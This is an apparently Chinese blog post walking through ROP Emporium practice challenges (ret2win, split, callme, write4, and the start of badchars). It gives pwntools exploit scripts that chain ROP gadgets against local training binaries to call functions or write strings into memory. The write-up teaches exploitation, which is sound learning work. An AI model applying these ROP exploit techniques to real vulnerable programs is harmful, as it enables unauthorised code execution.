

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.jpg">
  <link rel="icon" href="/img/favicon.jpg">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="记录练习ROP_Emporium的解题过程">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>ROP_Emporium详解 - Zino&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"zino00.github.io","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":1},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":"f45dcd001d67e8f9d84f91248ea31abf","google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Zino's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/post.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="ROP_Emporium详解">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-11-11 14:04" pubdate>
        2022年11月11日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.5k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      48
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">ROP_Emporium详解</h1>
            
            <div class="markdown-body">
              <h1 id="challenge-1"><a class="markdownIt-Anchor" href="#challenge-1"></a> Challenge 1</h1>
<h2 id="ret2win32"><a class="markdownIt-Anchor" href="#ret2win32"></a> ret2win32</h2>
<p>checksec查看文件保护措施</p>
<p><img src="/posts/716baf74/image-20221103152716601.png" srcset="/img/loading.gif" lazyload alt="image-20221103152716601"></p>
<p>用ida看下代码</p>
<p><img src="/posts/716baf74/image-20221103152759689.png" srcset="/img/loading.gif" lazyload alt="image-20221103152759689"></p>
<p>发现read存在栈溢出，缓冲区大小为0x28</p>
<p>同时存在可以直接利用的函数</p>
<p><img src="/posts/716baf74/image-20221103152843343.png" srcset="/img/loading.gif" lazyload alt="image-20221103152843343"></p>
<p><img src="/posts/716baf74/image-20221103152905146.png" srcset="/img/loading.gif" lazyload alt="image-20221103152905146"></p>
<p>所以构造exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># elf = ELF(&#x27;./ciscn_2019_en_2&#x27;)</span><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./ret2win32&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>ret2win=<span class="hljs-number">0x804862c</span><br>payload =junk+ p32(ret2win)<br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h2 id="ret2win64"><a class="markdownIt-Anchor" href="#ret2win64"></a> ret2win64</h2>
<p>64位基本相同，缓冲区大小和ret2win函数地址发生变化，修改一下这些就可以</p>
<p>但是实际还是遇到了问题，ret2win函数成功执行了，但是flag一直没有打出来，后来发现还是system函数的栈对齐问题，这个函数在ubuntu18以上中需要使得栈对齐0x10，所以需要给他加一个ret来使栈对齐。</p>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># elf = ELF(&#x27;./ciscn_2019_en_2&#x27;)</span><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./ret2win&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br>ret2win=<span class="hljs-number">0x400756</span><br>ret=<span class="hljs-number">0x4006E7</span><br>payload =junk+ p64(ret)+p64(ret2win)<br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h1 id="challenge-2"><a class="markdownIt-Anchor" href="#challenge-2"></a> Challenge 2</h1>
<h2 id="split32"><a class="markdownIt-Anchor" href="#split32"></a> split32</h2>
<p>代码和上面基本上一样，没有了可以直接利用的函数，但是shift+f12可以发现一个有用的字符串</p>
<p><img src="/posts/716baf74/image-20221103161840597.png" srcset="/img/loading.gif" lazyload alt="image-20221103161840597"></p>
<p><img src="/posts/716baf74/image-20221103161834209.png" srcset="/img/loading.gif" lazyload alt="image-20221103161834209"></p>
<p>同时text段里也有直接调用system的代码</p>
<p><img src="/posts/716baf74/image-20221103161734111.png" srcset="/img/loading.gif" lazyload alt="image-20221103161734111"></p>
<p>所以可以通过构造栈来完成ROP攻击，将/bin/cat flag.txt作为system函数的参数调用</p>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># elf = ELF(&#x27;./ciscn_2019_en_2&#x27;)</span><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./split32&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>system = <span class="hljs-number">0x804861A</span><br>bincat = <span class="hljs-number">0x804A030</span><br>payload =junk+ p32(system)+p32(bincat)<br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<p>也可以用plt表里system函数的地址，因为call最终也是通过转到plt表，然后再通过got表来找到system函数的真实地址的。</p>
<p>这样的exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># elf = ELF(&#x27;./ciscn_2019_en_2&#x27;)</span><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./split32&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>system = <span class="hljs-number">0x80483E0</span><br>bincat = <span class="hljs-number">0x804A030</span><br>payload =junk+ p32(system)+p32(<span class="hljs-number">0</span>)+p32(bincat)<br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h2 id="split64"><a class="markdownIt-Anchor" href="#split64"></a> split64</h2>
<p>64位的区别为参数不再以压栈的方式提供给函数，而是依次将前六个参数保存在rdi,rsi,rdx,rcx,r8,r9中，后面还有参数才通过压栈传递。</p>
<p>而system函数需要一个参数“/bin/cat flag.txt”，所以我们需要一个pop rdi; ret指令来将字符串放入rdi中</p>
<p>采用ROPgadget来查找这个指令</p>
<p><img src="/posts/716baf74/image-20221103163234081.png" srcset="/img/loading.gif" lazyload alt="image-20221103163234081"></p>
<p>exp构造如下</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221103</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># elf = ELF(&#x27;./ciscn_2019_en_2&#x27;)</span><br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./split&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br>system = <span class="hljs-number">0x40074B</span><br>bincat = <span class="hljs-number">0x601060</span><br>pop_rdi_ret=<span class="hljs-number">0x4007c3</span><br>payload =junk+p64(pop_rdi_ret) +p64(bincat)+p64(system)<br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h1 id="challenge-3"><a class="markdownIt-Anchor" href="#challenge-3"></a> Challenge 3</h1>
<h2 id="callme32"><a class="markdownIt-Anchor" href="#callme32"></a> callme32</h2>
<p>题目还是和之前的一样，但是这题要求连续调用三个函数，callme_one,callme_two,callme_three。</p>
<p>这三个函数时外部函数，但是我们可以通过其plt表来调用它们。</p>
<p>同时根据题目所给的libccallme32.so文件，我们可知这三个函数有三个参数，需要让这三个参数等于下面的值。</p>
<p><img src="/posts/716baf74/image-20221103190752638.png" srcset="/img/loading.gif" lazyload alt="image-20221103190752638"></p>
<p>为了连续调用，我们需要手动控制栈帧，因为在调用one的时候栈里放入了三个参数，这会影响接下来的调用，所以我们要找一个具有三个pop并以ret结尾的指令来将这三个参数出栈。</p>
<p>用ROPgadget找一下：</p>
<p><img src="/posts/716baf74/image-20221103191045702.png" srcset="/img/loading.gif" lazyload alt="image-20221103191045702"></p>
<p>所以exp构造如下：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221103</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./callme32&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./callme32&#x27;</span>)<br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>callmeone=elf.plt.callme_one<br>callmetwo=elf.plt.callme_two<br>callmethree=elf.plt.callme_three<br>pop3=<span class="hljs-number">0x080487f9</span><br>a1=<span class="hljs-number">0xDEADBEEF</span><br>a2=<span class="hljs-number">0xCAFEBABE</span><br>a3=<span class="hljs-number">0xD00DF00D</span><br>payload=junk+p32(callmeone)+p32(pop3)+p32(a1)+p32(a2)+p32(a3)<br>payload+=p32(callmetwo)+p32(pop3)+p32(a1)+p32(a2)+p32(a3)<br>payload+=p32(callmethree)+p32(pop3)+p32(a1)+p32(a2)+p32(a3)<br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h2 id="callme64"><a class="markdownIt-Anchor" href="#callme64"></a> callme64</h2>
<p>64位的变化在于传参方式改变，三个参数需要依次放入rdi,rsi,rdx，所以需要找一条这样的指令，如下</p>
<p><img src="/posts/716baf74/image-20221103191535295.png" srcset="/img/loading.gif" lazyload alt="image-20221103191535295"></p>
<p>同时注意到三个参数的值也变了，需要换一下。</p>
<p><img src="/posts/716baf74/image-20221103191916858.png" srcset="/img/loading.gif" lazyload alt="image-20221103191916858"></p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221103</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./callme&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./callme&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br>callmeone=elf.plt.callme_one<br>callmetwo=elf.plt.callme_two<br>callmethree=elf.plt.callme_three<br>pop3=<span class="hljs-number">0x40093c</span><br>a1=<span class="hljs-number">0xDEADBEEFDEADBEEF</span><br>a2=<span class="hljs-number">0xCAFEBABECAFEBABE</span><br>a3=<span class="hljs-number">0xD00DF00DD00DF00D</span><br>payload =junk+p64(pop3) +p64(a1)+p64(a2)+p64(a3)+p64(callmeone)<br>payload+=p64(pop3) +p64(a1)+p64(a2)+p64(a3)+p64(callmetwo)<br>payload+=p64(pop3) +p64(a1)+p64(a2)+p64(a3)+p64(callmethree)<br>io.send(payload)<br><br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h1 id="challenge-4"><a class="markdownIt-Anchor" href="#challenge-4"></a> Challenge 4</h1>
<h2 id="write432"><a class="markdownIt-Anchor" href="#write432"></a> write432</h2>
<p>这题没有信息，来pwnme也是外部函数了，但是根据前面题目的套路，一般会有提示，所以就看一下usefulfunction，发现这个也是外部函数，所以还是去so文件看一下</p>
<p>pwnme函数还是和前面一样，print_file函数如下：</p>
<p><img src="/posts/716baf74/image-20221103200842809.png" srcset="/img/loading.gif" lazyload alt="image-20221103200842809"></p>
<p>可知只要我们将其参数设置为“flag.txt&quot;，就可以让它打印出flag</p>
<p>而要达到这个目的，我们就要将&quot;flag.txt&quot;写入内存中。</p>
<p>用ROPgadget看一下mov指令，因为这个指令可以实现写操作</p>
<p>正好，图中指令正好可以实现这个目的，我们只要控制好edi和ebp的值即可，将edi设置为内存地址，将ebp设置为要写入的字符串。</p>
<p><img src="/posts/716baf74/image-20221103201210997.png" srcset="/img/loading.gif" lazyload alt="image-20221103201210997"></p>
<p>所以我们再找一下有没有pop edi和pop ebp指令，正好第二条指令全部满足了</p>
<p><img src="/posts/716baf74/image-20221103201419217.png" srcset="/img/loading.gif" lazyload alt="image-20221103201419217"></p>
<p>下面就是找可以写入的内存地址了。</p>
<p>用gdb run一下程序，然后用vmmap查看内存信息</p>
<p>可以看到如下的data段都是可写的</p>
<p><img src="/posts/716baf74/image-20221103201702507.png" srcset="/img/loading.gif" lazyload alt="image-20221103201702507"></p>
<p>去ida里看下，发现正好是从plt开始的地方</p>
<p>plt不能修改，但是data段和bss段应该都可以写</p>
<p>我选择了data段，因为是32位程序，所以每次只能写入四个字节，需要分两次写入</p>
<p><img src="/posts/716baf74/image-20221103201830701.png" srcset="/img/loading.gif" lazyload alt="image-20221103201830701"></p>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221103</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./write432&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./write432&#x27;</span>)<br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x28</span>+<span class="hljs-number">4</span>)<br>print_file=elf.plt.print_file<br>pop_edi_ebp=<span class="hljs-number">0x80485aa</span><br>mov_edi_ebp=<span class="hljs-number">0x8048543</span><br>data_addr=<span class="hljs-number">0x804a018</span><br><br>payload=junk+p32(pop_edi_ebp)+p32(data_addr)+<span class="hljs-string">b&#x27;flag&#x27;</span>+p32(mov_edi_ebp)<br>payload+=p32(pop_edi_ebp)+p32(data_addr+<span class="hljs-number">4</span>)+<span class="hljs-string">b&#x27;.txt&#x27;</span>+p32(mov_edi_ebp)<br>payload+=p32(print_file)+p32(<span class="hljs-number">0</span>)+p32(data_addr)<br><br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h2 id="write4"><a class="markdownIt-Anchor" href="#write4"></a> write4</h2>
<p>64位同理，找两个需要的gadget,如下</p>
<p><img src="/posts/716baf74/image-20221103202312776.png" srcset="/img/loading.gif" lazyload alt="image-20221103202312776"></p>
<p><img src="/posts/716baf74/image-20221103202406717.png" srcset="/img/loading.gif" lazyload alt="image-20221103202406717"></p>
<p>找可写入的内存地址</p>
<p><img src="/posts/716baf74/image-20221103202955980.png" srcset="/img/loading.gif" lazyload alt="image-20221103202955980"></p>
<p><img src="/posts/716baf74/image-20221103202546411.png" srcset="/img/loading.gif" lazyload alt="image-20221103202546411"></p>
<p>64位还需要一个传递参数的gadget，再找一下</p>
<p><img src="/posts/716baf74/image-20221103202728034.png" srcset="/img/loading.gif" lazyload alt="image-20221103202728034"></p>
<p>因为是64位，所以只需要写一次就可以。</p>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221103</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./write4&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;amd64&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span class="hljs-string">&#x27;./write4&#x27;</span>)<br>    <br>junk=<span class="hljs-string">b&#x27;a&#x27;</span>*(<span class="hljs-number">0x20</span>+<span class="hljs-number">8</span>)<br>print_file=elf.plt.print_file<br>mov_r14_r15=<span class="hljs-number">0x400628</span><br>pop_r14_r15=<span class="hljs-number">0x400690</span><br>data_addr=<span class="hljs-number">0x601028</span><br><br>pop_rdi=<span class="hljs-number">0x400693</span><br>payload =junk+p64(pop_r14_r15) +p64(data_addr)+<span class="hljs-string">b&#x27;flag.txt&#x27;</span>+p64(mov_r14_r15)<br>payload+=p64(pop_rdi)+p64(data_addr)+p64(print_file) <br><br>io.send(payload)<br>io.interactive()<br></code></pre></div></td></tr></table></figure>
<h1 id="challenge-5"><a class="markdownIt-Anchor" href="#challenge-5"></a> Challenge 5</h1>
<h2 id="badchars32"><a class="markdownIt-Anchor" href="#badchars32"></a> badchars32</h2>
<p>这题寻找和上面的write4很类似，不同之处在于pwnme函数多了badchar检查</p>
<p><img src="/posts/716baf74/image-20221103215654975.png" srcset="/img/loading.gif" lazyload alt="image-20221103215654975"></p>
<p>当我们输入的字符串中含有上图所示的字符时，这些字符就会被替换掉。很不幸，我们要写入内存的flag.txt中正好含有上述字符。</p>
<p>解决办法就是通过异或加密来绕过检查。首先，在写入内存前，我们将其每个字符都异或一次，确保其中不存在badchar,</p>
<p>然后，在成功写入内存后，我们再通过寻找含有xor指令的gadget，来对内存中的数据进行异或解密，如果我们达到了绕过检查的目的。</p>
<figure class="highlight python"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs python"><span class="hljs-comment"># 221103</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>elf = ELF(<span class="hljs-string">&#x27;./badchars32&#x27;</span>)<br>context(os=<span class="hljs-string">&#x27;linux&#x27;</span>, arch=<span class="hljs-string">&#x27;i386&#x27;</span>, log_level=<span class="hljs-string">&#x27;info&#x27;</span>)<br>io = process(<span 